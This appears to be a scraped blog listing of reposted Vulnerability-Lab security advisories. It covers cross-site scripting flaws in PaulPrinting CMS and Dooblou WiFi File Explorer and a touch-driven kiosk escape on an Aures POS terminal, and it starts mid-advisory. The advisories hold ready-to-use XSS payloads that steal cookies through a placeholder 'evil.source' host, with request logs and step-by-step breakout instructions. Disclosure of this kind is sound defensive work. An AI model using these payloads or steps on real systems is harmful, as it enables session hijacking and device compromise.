layui-icon-ok"></i></div> </td> <td style="height:32px;"> <span id="c_3">test2"<iimg src="evil.source" onload="alert(document.cookie)"></iimg></span></td> <td align="center">2022/07/17 20:10</td> <td class="td-manage" style="border-right-width:1px;text-align:center;"> <a title="Copy" onclick="copy(3)" href="javascript:;"> <i class="iconfont">&nbsp;&nbsp;</i> </a> <a title="Delete" onclick="deleteLog(this,3)" href="javascript:;"> <i class="layui-icon">&nbsp;&nbsp;</i> </a></td></tr></tbody></table> --- PoC Session Logs #1 (POST) --- (Add) http://localhost:8080/file_action Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 210 Origin:http://localhost:8080 Connection: keep-alive Referer:http://localhost:8080/webile_files Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 i={"action":"create","file_path":"/storage/emulated/0","new_file_name":"pwnd23>"<iimg src=evil.source onload=alert(document.cookie)></iimg>"} - POST: HTTP/1.1 200 OK Content-Type: application/json Connection: keep-alive Content-Encoding: gzip Transfer-Encoding: chunked - http://localhost:8080/evil.source Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer:http://localhost:8080/webile_files Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 200 OK Content-Type: application/octet-stream Connection: keep-alive Content-Length: 0 - Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 --- PoC Session Logs #2 (POST) --- (Send) http://localhost:8080/send Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 180 Origin:http://localhost:8080 Connection: keep-alive Referer:http://localhost:8080/webile_send Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 i={"os":"Windows Windows 10","b":"firefox 102.0","c":">"<iimg src=evil.source onload=alert(document.cookie)></iimg>"} - POST: HTTP/1.1 200 OK Content-Type: application/json Connection: keep-alive Content-Encoding: gzip Transfer-Encoding: chunked - http://localhost:8080/evil.source Host: localhost:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer:http://localhost:8080/webile_send Cookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6 Upgrade-Insecure-Requests: 1 - GET: HTTP/1.1 200 OK Content-Type: application/octet-stream Date: Sun, 17 Jul 2022 18:08:33 GMT Connection: keep-alive Content-Length: 0 Security Risk: ============== The security risk of the persistent web vulnerabilities in the mobile web application is estimated as medium.
  21. HireHackking

    PaulPrinting CMS - (Search Delivery) Cross Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: PaulPrinting CMS - (Search Delivery) Cross Site Scripting References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2286 Release Date: ============= 2023-07-17 Vulnerability Laboratory ID (VL-ID): ==================================== 2286 Common Vulnerability Scoring System: ==================================== 5.2 Vulnerability Class: ==================== Cross Site Scripting - Non Persistent Product & Service Introduction: =============================== PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface. (Copy of the Homepage:https://codecanyon.net/user/codepaul ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a non-persistent cross site vulnerability in the PaulPrinting (v2018) cms web-application. Vulnerability Disclosure Timeline: ================================== 2022-08-25: Researcher Notification & Coordination (Security Researcher) 2022-08-26: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2023-07-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Open Authentication (Anonymous Privileges) User Interaction: ================= Medium User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A client-side cross site scripting vulnerability has been discovered in the official PaulPrinting (v2018) cms web-application. Remote attackers are able to manipulate client-side requests by injection of malicious script code to compromise user session data. The client-side cross site scripting web vulnerability is located in the search input field with the insecure validated q parameter affecting the delivery module. Remote attackers are able to inject own malicious script code to the search input to provoke a client-side script code execution without secure encode. The request method to execute is GET and the attack vector is non-persistent. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected application modules. Request Method(s): [+] GET Vulnerable Module(s): [+] /account/delivery Vulnerable Input(s): [+] Search Vulnerable Parameter(s): [+] q Affected Module(s): [+] /account/delivery [+] Delivery Contacts Proof of Concept (PoC): ======================= The non-persistent xss web vulnerability can be exploited by remote attackers with low privileged user account and medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Example https://codeawesome.in/printing/account/delivery?q= PoC: Exploitation https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)> --- PoC Session Logs (GET) --- https://codeawesome.in/printing/account/delivery?q=a"><iframe src=evil.source onload=alert(document.cookie)> Host: codeawesome.in Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Cookie: member_login=1; member_id=123; session_id=25246428fe6e707a3be0e0ce54f0e5bf; - GET: HTTP/3.0 200 OK content-type: text/html; charset=UTF-8 x-powered-by: PHP/7.1.33 Vulnerable Source: (Search - delivery?q=) <div class="col-lg-8"> <a href="https://codeawesome.in/printing/account/delivery" class="btn btn-primary mt-4 mb-2 float-right"> <i class="fa fa-fw fa-plus"></i> </a> <form class="form-inline mt-4 mb-2" method="get"> <div class="input-group mb-3 mr-2"> <input type="text" class="form-control" name="q" value="a"><iframe src="evil.source" onload="alert(document.cookie)">"> <div class="input-group-append"> <button class="btn btn-outline-secondary" type="submit" id="button-addon2"><i class="fa fa-fw fa-search"></i></button> </div></div> Security Risk: ============== The security risk of the cross site scripting web vulnerability with non-persistent attack vector is estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
  22. HireHackking

    Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2317 Release Date: ============= 2023-07-04 Vulnerability Laboratory ID (VL-ID): ==================================== 2317 Common Vulnerability Scoring System: ==================================== 5.1 Vulnerability Class: ==================== Multiple Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== Browse, download and stream individual files that are on your Android device, using a web browser via a WiFi connection. No more taking your phone apart to get the SD card out or grabbing your cable to access your camera pictures and copy across your favourite MP3s. (Copy of the Homepage:https://play.google.com/store/apps/details?id=com.dooblou.WiFiFileExplorer ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple web vulnerabilities in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application. Affected Product(s): ==================== Product Owner: dooblou Product: Dooblou WiFi File Explorer v1.13.3 - (Android) (Framework) (Wifi) (Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-01-19: Researcher Notification & Coordination (Security Researcher) 2022-01-20: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2023-07-04: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Independent Security Research Technical Details & Description: ================================ Multiple input validation web vulnerabilities has been discovered in the official Dooblou WiFi File Explorer 1.13.3 mobile android wifi web-application. The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser to web-application requests from the application-side. The vulnerabilities are located in the `search`, `order`, `download`, `mode` parameters. The requested content via get method request is insecure validated and executes malicious script codes. The attack vector is non-persistent and the rquest method to inject is get. Attacker do not need to be authorized to perform an attack to execute malicious script codes. The links can be included as malformed upload for example to provoke an execute bby a view of the front- & backend of the wifi explorer. Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious source and non-persistent manipulation of affected application modules. Proof of Concept (PoC): ======================= The input validation web vulnerabilities can be exploited by remote attackers without user account and with low user interaction. For security demonstration or to reproduce the web vulnerabilities follow the provided information and steps below to continue. PoC: Exploitation http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK PATH TO RETURN INDEX</a> http://localhost:8000/storage/emulated/0/Download/?mode=31&search=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert%28document.domain%29%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX%3C%2Fa%3E&x=3&y=3 http://localhost:8000/storage/emulated/0/Download/?mode=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3 http://localhost:8000/storage/emulated/?order=%3Ca+href%3D%22https%3A%2F%2Fevil.source%22+onmouseover%3Dalert(document.domain)%3E%3Cbr%3EPLEASE+CLICK+PATH+TO+RETURN+INDEX Vulnerable Sources: Execution Points <table width="100%" cellspacing="0" cellpadding="16" border="0"><tbody><tr><td style="vertical-align:top;"><table style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0"><tbody><tr><td><center><span class="doob_large_text">ERROR</span></center></td></tr></tbody></table><br><tabl e style="background-color: #B2B2B2; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" width="700" cellspacing="3" cellpadding="5" border="0"> <tbody><tr><td><span class="doob_medium_text">Cannot find file or directory! /storage/emulated/0/Download/<a href="https://evil.source" onmouseover="alert(document.domain)"><br>PLEASE CLICK USER PATH TO RETURN INDEX</a></span></td></tr></tbody></table><br><span class="doob_medium_text"><span class="doob_link">&nbsp;&nbsp;<a href="/">>>&nbsp;Back To Files&nbsp;>></a></span></span><br></td></tr></tbody></table><br> - <li></li></ul></span></span></td></tr></tbody></table></div><div class="body row scroll-x scroll-y"><table width="100%" cellspacing="0" cellpadding="6" border="0"><tbody><tr> <td style="vertical-align:top;" width="100%"><form name="multiSelect" style="margin: 0px; padding: 0px;" action="/storage/emulated/0/Download/" enctype="multipart/form-data" method="POST"> <input type="hidden" name="fileNames" value=""><table width="100%" cellspacing="0" cellpadding="1" border="0" bgcolor="#000000"><tbody><tr><td> <table width="100%" cellspacing="2" cellpadding="3" border="0" bgcolor="#FFFFFF"><tbody><tr style="background-color: #FFA81E; background-image: url(/x99_dooblou_res/x99_dooblou_gradient.png); background-repeat: repeat-x; background-position:top;" height="30"><td colspan="5"><table width="100%" cellspacing="0" cellpadding="0" border="0"><tbody><tr><td style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;</span></td><td style="white-space: nowrap;vertical-align:middle" align="right"><span class="doob_small_text_bold"> &nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=23&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"> <img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; <a href="?view=24&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN INDEX&search=a"> <img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; <a href="?view=38&mode=<a href=" https:="" evil.source"="" onmouseover="alert(document.domain)"><br>PLEASE CLICK PATH TO RETURN I - <td style="white-space: nowrap;vertical-align:middle"><input value="" type="checkbox" name="selectAll" onclick="setCheckAll();">&nbsp;&nbsp;<a class="doob_button" href="javascript:setMultiSelect('/storage/emulated/', 'action', '18&order=>" <<="">>"<a href="https://evil.source" onmouseover=alert(document.domain)">');javascript:document.multiSelect.submit();" style="">Download</a>&nbsp;<a class="doob_button" href="javascript:setMultiSelectConfirm('Are you sure you want to delete? This cannot be undone!', '/storage/emulated/', 'action', '13&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>');javascript:document.multiSelect.submit();" style="">Delete</a>&nbsp; <a class="doob_button" href='javascript:setMultiSelectPromptQuery("Create Copy", "/storage/emulated/", "/storage/emulated/", "action", "35&order=>"<<<a href="https://evil.source" onmouseover=alert(document.domain)>", "name");javascript:document.multiSelect.submit();' style="">Create Copy</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Zip</a>&nbsp;<a class="doob_button" href="x99_dooblou_pro_version.html" style="">Unzip</a></td> <td align="right" style="white-space: nowrap;vertical-align:middle"><span class="doob_small_text_bold">&nbsp;&nbsp;&nbsp;&nbsp;<a href="javascript:showTreeview()"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_tree_dark.png" alt="img" title="Show Treeview"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; <a href="?view=23&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_details.png" alt="img" title="Details"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp;<a href="?view=24&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_thumbnails.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;&nbsp; <a href="?view=38&order=>"<<><a href="https://evil.source" onmouseover=alert(document.domain)>"><img style="vertical-align:middle;border-style: none" src="/x99_dooblou_res/x99_dooblou_grid.png" alt="img" title="Thumbnails"></a>&nbsp;&nbsp;&nbsp;&nbsp;</span></td></tr></table> ---PoC Session Logs --- http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer:http://localhost:8000/storage/emulated/0/Download/%3Ca%20href=%22https://evil.source%22%20onmouseover=alert(document.domain)%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E GET: HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/xml - http://localhost:8000/storage/emulated/0/Download/?mode=<a+href%3D"https%3A%2F%2Fevil.source"+onmouseover%3Dalert(document.domain)><br>PLEASE+CLICK+PATH+TO+RETURN+INDEX&search=a&x=3&y=3 Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Cookie: treeview=0 Upgrade-Insecure-Requests: 1 GET: HTTP/1.1 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html - http://localhost:8000/storage/emulated/0/Download/<a href="https://evil.source" onmouseover=alert(document.domain)><br>PLEASE CLICK USER PATH TO RETURN INDEX</x99_dooblou_wifi_signal_strength.xml Host: localhost:8000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: */* Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive Referer:http://localhost:8000/storage/emulated/0/Download/%<a href="https://evil.source" onmouseover=alert(document.domain)>%3E%3Cbr%3EPLEASE%20CLICK%20USER%20PATH%20TO%20RETURN%20INDEX%3C/a%3E GET: HTTP/1.1 200 OK Cache-Control: no-cache Content-Type: text/xml Security Risk: ============== The security risk of the multiple web vulnerabilities in the ios mobile wifi web-application are estimated as medium.
  23. HireHackking

    PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: PaulPrinting CMS - Multiple Cross Site Web Vulnerabilities References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2285 Release Date: ============= 2023-07-19 Vulnerability Laboratory ID (VL-ID): ==================================== 2285 Common Vulnerability Scoring System: ==================================== 5.8 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 500€ - 1.000€ Product & Service Introduction: =============================== PaulPrinting is designed feature rich, easy to use, search engine friendly, modern design and with a visually appealing interface. (Copy of the Homepage:https://codecanyon.net/user/codepaul ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered multiple persistent cross site vulnerabilities in the PaulPrinting (v2018) cms web-application. Affected Product(s): ==================== CodePaul Product: PaulPrinting (2018) - CMS (Web-Application) Vulnerability Disclosure Timeline: ================================== 2022-08-25: Researcher Notification & Coordination (Security Researcher) 2022-08-26: Vendor Notification (Security Department) 2022-**-**: Vendor Response/Feedback (Security Department) 2022-**-**: Vendor Fix/Patch (Service Developer Team) 2022-**-**: Security Acknowledgements (Security Department) 2023-07-19: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (User Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ Multiple persistent input validation vulnerabilities has been discovered in the official PaulPrinting (v2018) cms web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The first vulnerability is located in the register module. Remote attackers are able to register user account with malicious script code. After the registration to attacker provokes an execution of the malformed scripts on review of the settings or by user reviews of admins in the backend (listing). The second vulnerability is located in the delivery module. Remote attackers with low privileged user accounts are able to inject own malicious script code to contact details. Thus allows to perform an execute on each interaction with users or by reviews of admins in the backend (listing). Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] /printing/register [+] /account/delivery Vulnerable Input(s): [+] First name [+] Last name [+] Address [+] City [+] State Vulnerable Parameter(s): [+] firstname [+] lastname [+] address [+] city [+] state Affected Module(s): [+] Frontend Settings (./printing/account/setting) [+] Frontend Delivery Address (./printing/account/delivery) [+] Backend User Preview Listing [+] Backend Delivery Address Contact Review Proof of Concept (PoC): ======================= The persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged user account and low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open your browser and start a http session tamper 2. Register in the application by login click to register 3. Inject to the marked vulnerable input fields your test payload 4. Save the entry by submit via post method 5. Login to the account and preview the settings Note: Administrators in the backend have the same wrong validated context that executes on preview of users 6. The script code executes on preview of the profile - settings 7. Successful reproduce of the first vulnerability! 8. Followup by opening the Delivery address module 9. Add a contact and add in the same vulnerable marked input fields your test payload Note: T he script code executes on each review of the address in the backend or user frontend 10. Successful reproduce of the second vulnerability! Exploitation: Payload "<iframe src=evil.source onload(alert(document.cookie)> "<iframe src=evil.source onload(alert(document.domain)> --- PoC Session Logs (POST) --- https://paulprinting.localhost:8000/printing/account/setting Host: paulprinting.localhost:8000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 357 Origin:https://paulprinting.localhost:8000 Connection: keep-alive Referer:https://paulprinting.localhost:8000/printing/account/setting Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd; POST: title=Mr.&firstname=a"<iframe src=evil.source onload(alert(document.cookie)>> &lastname=b"<iframe src=evil.source onload(alert(document.cookie)>> &address=c"<iframe src=evil.source onload(alert(document.cookie)>> &city=d"<iframe src=evil.source onload(alert(document.cookie)>> &state=e"<iframe src=evil.source onload(alert(document.cookie)>> &zipcode=2342&country=BS&phone=23523515235235&save=Save - POST: HTTP/3.0 302 Found content-type: text/html; charset=UTF-8 x-powered-by: PHP/7.1.33 location:https://paulprinting.localhost:8000/printing/account/setting?save=1 - https://paulprinting.localhost:8000/printing/account/setting?save=1 Host: paulprinting.localhost:8000 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Referer:https://paulprinting.localhost:8000/printing/account/setting Connection: keep-alive Cookie: member_login=1; member_id=123; session_id=13446428fe6e202a3be0e0ce23f0e5cd; - POST: HTTP/3.0 200 OK content-type: text/html; charset=UTF-8 x-powered-by: PHP/7.1.33 Vulnerable Source: Your Account - Settings <div class="form-group row"> <label class="col-sm-4 col-form-label">First name</label> <div class="col-sm-8"> <input type="text" name="firsttname" class="form-control" value="a"<iframe src=evil.source onload(alert(document.cookie)>"> </div></div> <label class="col-sm-4 col-form-label">Last name</label> <div class="col-sm-8"> <input type="text" name="lastname" class="form-control" value="b"<iframe src=evil.source onload(alert(document.cookie)>"> </div></div> <div class="form-group row"> <label class="col-sm-4 col-form-label">Address</label> <div class="col-sm-8"> <input type="text" name="address" class="form-control" value="c"<iframe src=evil.source onload(alert(document.cookie)>"> </div></div> <div class="form-group row"> <label class="col-sm-4 col-form-label">City</label> <div class="col-sm-8"> <input type="text" name="city" class="form-control" value="d"<iframe src=evil.source onload(alert(document.cookie)>"> </div></div> <div class="form-group row"> <label class="col-sm-4 col-form-label">State</label> <div class="col-sm-8"> <input type="text" name="state" class="form-control" value="e"<iframe src=evil.source onload(alert(document.cookie)>"> </div></div> Vulnerable Source: Deliery Contact (Address) <table class="table"> <thead> <tr> <th>Contact</th> <th>Address</th> <th>City</th> <th>State</th> <th>Country</th> <th></th> </tr> </thead> <tbody><tr> <td>a"<iframe src=evil.source onload(alert(document.cookie)></td> <td>b"<iframe src=evil.source onload(alert(document.cookie)></td> <td>c"<iframe src=evil.source onload(alert(document.cookie)></td> <td>d"<iframe src=evil.source onload(alert(document.cookie)></td> <td></td> <td class="text-right"> <a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10">Edit</a>| <a href="https://paulprinting.localhost:8000/printing/account/delivery?id=10&delete=1" onclick="return confirm('Delete')">Delete</a> </td></tr></tbody> </table> Security Risk: ============== The security risk of the cross site scripting web vulnerabilities with persistent attack vector are estimated as medium. Credits & Authors: ================== Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
  24. HireHackking

    Aures Booking & POS Terminal - Local Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    Exploit Title: Aures Booking & POS Terminal - Local Privilege Escalation References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2323 Release Date: ============= 2023-07-17 Vulnerability Laboratory ID (VL-ID): ==================================== 2323 Common Vulnerability Scoring System: ==================================== 7.2 Vulnerability Class: ==================== Privilege Escalation Current Estimated Price: ======================== 3.000€ - 4.000€ Product & Service Introduction: =============================== KOMET is an interactive, multifunctional kiosk and specially designed for the fast food industry. Available as a wall-mounted or freestanding model, its design is especially adapted to foodservice such as take-aways or fast food in system catering. The kiosk features a 27 YUNO touch system in portrait mode, an ODP 444 thermal receipt printer, a payment terminal and a 2D barcode scanner. With a click, the customer selects, books, orders, purchases and pays directly at the kiosk. The system offers the possibility to manage customer cards and promotions. Queue management can also be optimized. (Copy of the Homepage:https://aures.com/de/komet/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a local kiosk privilege escalation vulnerability in the operating system of the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. Affected Product(s): ==================== Aures Technologies GmbH Product: Aures Komet Booking & POS Terminal - (KIOSK) (Windows 10 IoT Enterprise) Vulnerability Disclosure Timeline: ================================== 2023-05-09: Researcher Notification & Coordination (Security Researcher) 2023-07-17: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Local Severity Level: =============== High Authentication Type: ==================== Open Authentication (Anonymous Privileges) User Interaction: ================= No User Interaction Disclosure Type: ================ Responsible Disclosure Technical Details & Description: ================================ A kiosk mode escalation vulnerability has been discovered in the operating system of the Aures Komet Booking & POS Terminal (Windows 10 IoT Enterprise) used by the german company immergrün franchise gmbh. The security vulnerability allows local attackers to bypass the kiosk mode to compromise the local file system and applications. It is possible for local attackers to escalate out of the kiosk mode in the aures komet booking & pos terminal. Local attackers are able to use the touch functionalities in the aures komet booking & pos terminal system to escalate with higher privileges. The security vulnerability is located in the context menu function of the extended menu on touch interaction. Attackers with restricted low local privileged access to the booking service front display are able to execute files, can unrestricted download contents or exfiltrate local file-system information of the compromised windows based operating system. No keyboard or connections are required to manipulate the service booking and payment terminal. The booking and payment terminal system vulnerability requires no user user interaction to become exploited and can only be triggered by local physical device access. Vulnerable Operating System(s): [+] Windows 10 (IoT Enterprise) Affected Component(s): [+] Context Menu Affected Function(s): [+] Web Search [+] Share (Teilen) Proof of Concept (PoC): ======================= The local vulnerability can be exploited by local attackers with physical device access without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. PoC: Sheet Touch Display => Select Food Item => Highlight Text => Open Context Menu => Extend Context Menu => Web-Search => Browser => Local File System => Compromised! Manual steps to reproduce the vulnerability ... 01. First touch the monitor display to move on from standby 02. Select an food item from the menu of immergrün (we recomment the cesar wraps) 03. Push the information button of the selected food item 04. Push twice via touch to mark the selected food item text 05. Press a third time after you have marked the context by holding it down on the touch display 06. Now the function context menu of the operating system for highlighted text appears 07. On the context menu appearing 3 dots to extend the visible function menu 08. Select the web-search or share function for the highlighted content in the context menu 09. The browser of the operating system opens on the main front screen 10.1 By now you are able to download an execute executables using the browser without any blacklisting (Unrestricted Web Access - Download of Files) 10.2 Attackers can open websites on the fron display to manipulate the visible content (Scam & Spam - Web Messages & Web Context) 10.3 Attackers are able to manipulate via browser debugger the web content displayed from immergrün (Phishing - Formular & Banking Information) 10.4 Attackers are able to access the local file system and compromise it by reconfiguration with privileged user account (Local File-System - Privilege Escaltion) 10.5 Attackers are able to infect the local operating system with ransomware or other malicious programs and scripts (Malware - Ransomware, Keylogger, Trojan-Banking & Co.) 10.6 Attackers are able to exfiltrate data from the local computer system using web connecting and available protocols 10.7 Attackers are able to perform man in the middle attacks from the local computer system 11.0 Successful reproduce of the security vulnerability! Reference(s): Pictures - 1.png (Terminal A) - 2.png (Terminal B) - 3.png (Escape) - 4.png (Awareness) Solution - Fix & Patch: ======================= The security vulnerabilities can be patched by following steps: 1. Disable the content menu to extend 2. Disable the context menu 3. Disable web-search 4. Disable to mark text inputs & texts 5. Disallow to open not white listed websites 6. Disable to download files 7. Restrict the web-browser access 8. Disallow the file browser 9. Disable the browser debug modus 10. Reconfigure the local firewall to allow and disallow connections 11. Change the access permission to prevent exfiltration Security Risk: ============== The security risk of the vulnerability in the local booking and payment terminal system is considered high. The issue can be easily exploited by local attackers with simple interaction via the touch display. Once compromised, the attackers can fully manipulate the computer's operating system and use it misuse it for further simple or more complex attack scenarios. Credits & Authors: ================== Benjamin Mejri (Kunz) -https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Lars Guenther -https://www.vulnerability-lab.com/show.php?user=L.+Guenther
  25. HireHackking

    Perch v3.2 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
